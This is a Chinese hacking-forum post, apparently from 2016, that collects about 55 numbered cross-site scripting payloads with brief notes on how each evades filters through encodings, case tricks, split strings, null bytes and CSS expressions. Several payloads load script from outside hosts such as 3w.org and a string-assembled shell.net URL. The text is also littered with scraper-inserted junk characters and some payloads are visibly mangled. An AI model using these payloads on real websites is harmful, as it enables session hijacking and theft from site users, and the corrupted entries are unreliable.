找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2465|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入: J) d  s3 D; X( _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 B' e6 O  J, M% C  R) S
(99)另类弹框
5 Y( s8 U% h) B
<q/oncut=alert()>1
. x% w% @" `  q. O<s/onclick=alert()>b
2 h  u, Q+ @3 d, r/ m* L' q+ j/ ^3 N <XSS=" onclick="alert(1)//">clickme</SSX=">
7 K6 H* C/ n4 X, x <zzz onclick=alert`1`>clickme</zzz>
, k% J/ f: S- ^+ f: R5 L <a onclick=alert`1`>clickme</a>
/ |+ l* s5 D: t( h3 \& [: u<a=">clickme</a=">
7 d) y8 O& N% p# |2 A/ o2 I<a=">clickme</a># _1 F& r: w+ `
<z=">clickme</z=">
2 P4 E9 |1 g7 d/ R( e/ T5 |<z onclick=alert`1`>clickme</z>- v' H  U5 s' I

' P9 z" l. b5 V1 w(2)IMG标签XSS使用JavaScript命令
. s1 U9 J* e: u; |, ?4 c, _' L+ \
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ `6 ]. T7 k/ f3 Q' V0 J0 a7 v
& B) Y# m3 {8 Z# I6 b' ~* _: D/ h
(3)IMG标签无分号无引号/ M6 ]6 N% g' Z7 X# w
<IMG SRC=javascript:alert(‘XSS’)>% u! X9 p( l) Q' l0 c* K+ f/ V

( T- `! Y7 c* M% e
(4)IMG标签大小写不敏感
6 u3 I  P8 V. j1 J- t
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>7 }0 l6 Y6 l4 F7 z
+ \2 S- e, ^9 L
(5)HTML编码(必须有分号)3 L$ |: ?8 C; }& `2 e
<IMG SRC=javascript:alert(“XSS”)>
( {3 N& t2 I2 a  x/ a6 N
/ J0 A. {6 ?' j0 p+ y# N" D
(6)修正缺陷IMG标签1 ]( v+ X" Q. ]( k( Y& X
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>: a! v2 w/ J% u
8 k' y5 x" E1 f
(7)formCharCode标签(计算器)
/ L" g/ I  T! U) @0 u0 c2 ], Z, l
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
. b* u* A' F! i! |
' j" k3 }2 L0 l& I8 m4 @- W% U
(8)UTF-8的Unicode编码(计算器)
6 c, z7 s: V5 q7 S! B# |$ L2 k4 x
<IMG SRC=jav..省略..S')>
( h8 Z. p0 G2 d$ K* D
, R2 n; k' d2 a+ A, G6 d; G; M
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)3 N( i' Z" a  |, a
<IMG SRC=jav..省略..S')>6 k9 a  q( \; r. l8 H  Z
! X+ B+ }2 J$ w+ w
(10)十六进制编码也是没有分号(计算器)
! u$ a$ n( r) E3 C
<IMG SRC=\'#\'" /span>4 I& u9 h+ M* K; b3 H
6 h1 C0 l2 @1 V7 g
(11)嵌入式标签,将Javascript分开
8 N' u7 b1 k8 Z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* K' s' P3 i! [: d  m- t" Q! M

: ^1 [) f0 i. s, \: ^6 @(12)嵌入式编码标签,将Javascript分开3 |% _: y  ^+ m
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ {  ?& d: s# i
: l3 q& k$ G2 X1 K4 [# O(13)嵌入式换行符8 ]! b1 [+ p7 R9 \+ t& A& U
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- t3 _. Y) r" i
+ g5 O. w* Y8 T& ?' S- d
(14)嵌入式回车
0 w- @$ E7 c" a' b; R: K<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ `. h$ X, W, B# g+ G# L  y! W7 ?- F2 {1 _
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 t$ F0 @6 Z/ [( K! {4 S# c<IMG SRC=\'#\'" /span>
8 j+ Z( q7 y7 g- Z' F2 _
* E& }( r7 S' x! Q) I; w(16)解决限制字符(要求同页面)
6 K3 |7 ^# p" c! z<script>z=’document.’</script>
! i$ x/ w* p! m/ J; r+ X<script>z=z+’write(“‘</script>
4 J' A+ q1 J" k$ K<script>z=z+’<script’</script>) w, i( \' a$ y' |9 n6 y
<script>z=z+’ src=ht’</script>( N* i$ u$ B9 _9 y% n5 i
<script>z=z+’tp://ww’</script>
+ g6 w, q3 }& f# E' I<script>z=z+’w.shell’</script>
9 t8 i+ p, q: r4 k& F2 S" A<script>z=z+’.net/1.’</script>+ g# t) t5 N/ H& I0 L& r5 g
<script>z=z+’js></sc’</script>/ [. T7 v/ R# |) i" I$ P5 I. C
<script>z=z+’ript>”)’</script>
. I+ P. t6 ]: {6 L/ j( U5 N<script>eval_r(z)</script>* M) o9 U% I8 `  B' j. r7 q
  f% J' G; R6 x/ V/ a
(17)空字符7 A( J$ m, C$ L6 o3 I. J
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out+ {3 b: v5 w9 d, ~. v7 d2 x, {
- X. h/ R$ K- N1 A3 ~
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
0 C! Y3 g8 ]5 b0 A+ Yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! E9 W7 w3 V3 ~/ o( r& u& a
4 T, K2 K8 S* P, f. ^2 v. a
(19)Spaces和meta前的IMG标签
' o& B- M* t+ [0 ^<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>% S- z1 f7 O7 N! ]( R
: J/ u+ ]8 }  g$ a8 P: I1 x$ F
(20)Non-alpha-non-digit XSS
! S, k2 J. v, V. |  ?<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
; m+ g& n: H! g9 H0 m# _3 ^2 @: `7 s7 w
(21)Non-alpha-non-digit XSS to 2
0 ]9 J" v: H! Q7 I, _& m<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
% J/ j+ l2 P: J( U
) X1 u! S, J5 _9 j, M  v  s! @(22)Non-alpha-non-digit XSS to 3
) L& e7 a; u( T0 b  ^$ k<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
2 Q7 [; z3 g- s! g3 V0 z9 _6 \4 U: [, {  {
(23)双开括号
& x& B% K1 d" k5 m; _<<SCRIPT>alert(“XSS”);//<</SCRIPT>! {5 Q2 Y# g! B' @

$ J# G2 f( t  l; ^7 N2 T(24)无结束脚本标记(仅火狐等浏览器). e; p, F% k) |3 D0 K, U: e
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 u% F5 g* D. d2 w
9 h0 D6 B" z+ K! V( Q3 Z. I/ N
(25)无结束脚本标记2
/ A6 V3 m! P; k! S; F0 V6 r<SCRIPT SRC=//3w.org/XSS/xss.js>) X. n7 I2 e' o. f: z' B0 e4 [

+ W" ]* t7 e  g" e! J$ w(26)半开的HTML/JavaScript XSS! w( m$ C" C) O! T1 c5 n" k, j% I
<IMG SRC=\'#\'" /span>
& w  q' W; Y# D' I- Q/ a( \, ?+ ^, m1 u" C9 c1 @
(27)双开角括号4 C5 A, ?6 E. I6 G6 R) f
<iframe src=http://3w.org/XSS.html <  I) l0 Z' M8 Y" x7 s  _: j* D
/ C' w! N$ Y3 C9 S$ M% G
(28)无单引号 双引号 分号1 X5 q" D" U3 M$ Q% W
<SCRIPT>a=/XSS/
/ D3 x& O$ k/ \9 jalert(a.source)</SCRIPT>
9 N1 h3 L; _" N
" e* u$ W# }- P/ h2 g(29)换码过滤的JavaScript
* H' w# c( M) ]\”;alert(‘XSS’);//- \, n+ i, o! X/ A" Q2 b+ o

, X# A% n% M0 v1 S% S) H(30)结束Title标签9 C2 U1 Q* G* H  |0 o
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>9 x; m) m1 t  m3 u+ ^9 \( f
1 q" h% V# j- n/ |' u" d
(31)Input Image; C% H$ A: N8 m2 \. q  Y
<INPUT SRC=\'#\'" /span>
$ q# U% ?( X/ N  [  f6 I- u2 [% m5 z/ p
(32)BODY Image2 H  ~0 [3 [; e  d! w1 x( y/ Z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
, q) ^3 L& |+ C0 B  o, V) A( E9 S3 k# t; h6 |( e
(33)BODY标签
# e1 x  k6 o' d, ^<BODY(‘XSS’)>; I5 @# g6 R, x$ @" ~9 R! h0 a
* E- f1 W* F; {& I7 @6 a. T% b
(34)IMG Dynsrc) r% _* l# q. H6 w8 U1 w+ D
<IMG DYNSRC=\'#\'" /span>
( q0 m/ k2 w; f" f( {: x5 Q* x# z. V0 `5 |9 @& Q: a/ o5 W% e1 y
(35)IMG Lowsrc
# J2 T# }% e8 z7 ~: ^<IMG LOWSRC=\'#\'" /span>' m# F) R' y' s& Z, w/ E2 L& B

% s! x7 b- ~! @, {' ~/ ^(36)BGSOUND
* ^" r- X" f6 R0 D6 W<BGSOUND SRC=\'#\'" /span>
: ?) M+ Y% U/ F# L: ]( m1 p. F8 c& _+ H/ J0 c4 K  Z9 Z9 b
(37)STYLE sheet- K5 L5 |* H9 w
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 Z& v9 Y# Q" E& n2 d  S, W& e0 ]
+ T4 X# r+ U/ B; ?8 H4 U8 d(38)远程样式表1 B# l- M9 c8 k. {
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 G8 R0 k" _5 b, R
) z5 B9 E. \8 I# L
(39)List-style-image(列表式)
& d( ~* K; t: X& \- B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS1 k# E; a1 m' `( q

7 a$ t4 k; y: Z$ E# Z$ |& o(40)IMG VBscript3 r; X. u0 J! Z  e, {
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS% r. S3 J$ i6 e8 ~
, |4 K: {# n* g5 _/ R6 `. j
(41)META链接url
9 D, W0 Y" r7 W<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
+ A( W( W, ?! T' J' u+ ~& W4 W- m& W8 M( T
(42)Iframe
7 j0 X; P/ o; J( J$ ?8 l<IFRAME SRC=\'#\'" /IFRAME>8 a7 }3 O. {" w  `
* _- i) q: C% N: E0 t
(43)Frame
# M# b" @; T3 C* D4 L<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>$ J. B: B+ i; p: ]
4 l3 b0 f! S; j% ^, p
(44)Table+ S+ p, E# n7 B3 X
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: U5 c2 [& y4 x% D6 L  N8 E2 e& X% e2 N
(45)TD
  G5 D+ U# u) p$ x$ m5 S<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>! J7 G6 a: P6 L% [: V! C7 S

9 l+ e: S- W. z5 w1 o, I" I2 d0 r( u1 N(46)DIV background-image
, ~7 G+ ^& c  f0 O<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 v0 R- R- E' V+ ?

6 p- X9 ^4 A6 B( R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
$ P$ G$ n/ k' r6 x, F) Y& r* U3 K<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>+ H0 a2 A3 m. v7 M
( }8 r( U# x! s: Q( \
(48)DIV expression. x# G4 m% |5 t
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>* V7 t9 ]" D+ T% \; g9 Q: \6 Y
% f3 G+ e7 Z, P6 {3 h' R
(49)STYLE属性分拆表达
7 l: z5 }2 r3 I5 ]( o<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* S2 e) H$ E' B1 E2 X! j
9 Z7 n0 i2 _% h) D/ }' k2 ^(50)匿名STYLE(组成:开角号和一个字母开头)$ Z3 \! l5 y& t
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
6 z% `: X9 E9 c! @9 L; s9 }- Z/ h
1 e" ?7 ]% b; ~; O3 j+ y8 r(51)STYLE background-image
: y! p! m: D% e. T/ M2 N: `) y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: {  R8 F8 N5 ?5 x$ a3 ]7 x; S6 j3 ~( p
(52)IMG STYLE方式& N; L; b2 S! ?
exppression(alert(“XSS”))’>
: V: E+ a; m- |, }) T! ^1 [" x& I
, i# `) e5 L. f8 A+ ]6 l4 a) e(53)STYLE background
& {4 o4 b4 U/ y+ {) M7 d<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>  t, U. a6 q) L$ u2 w0 g

5 k* F/ K3 F2 K  B& f+ r( G(54)BASE
  K3 F! U8 A- o. b: U  o' Z<BASE HREF=”javascript:alert(‘XSS’);//”>
6 \8 @6 c4 _* I1 N; S! {
6 I8 Q. p) a; ^(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 y3 s3 ^. G( I% L1 d8 i2 I
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

7 I( _/ ^5 B' d% P2 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表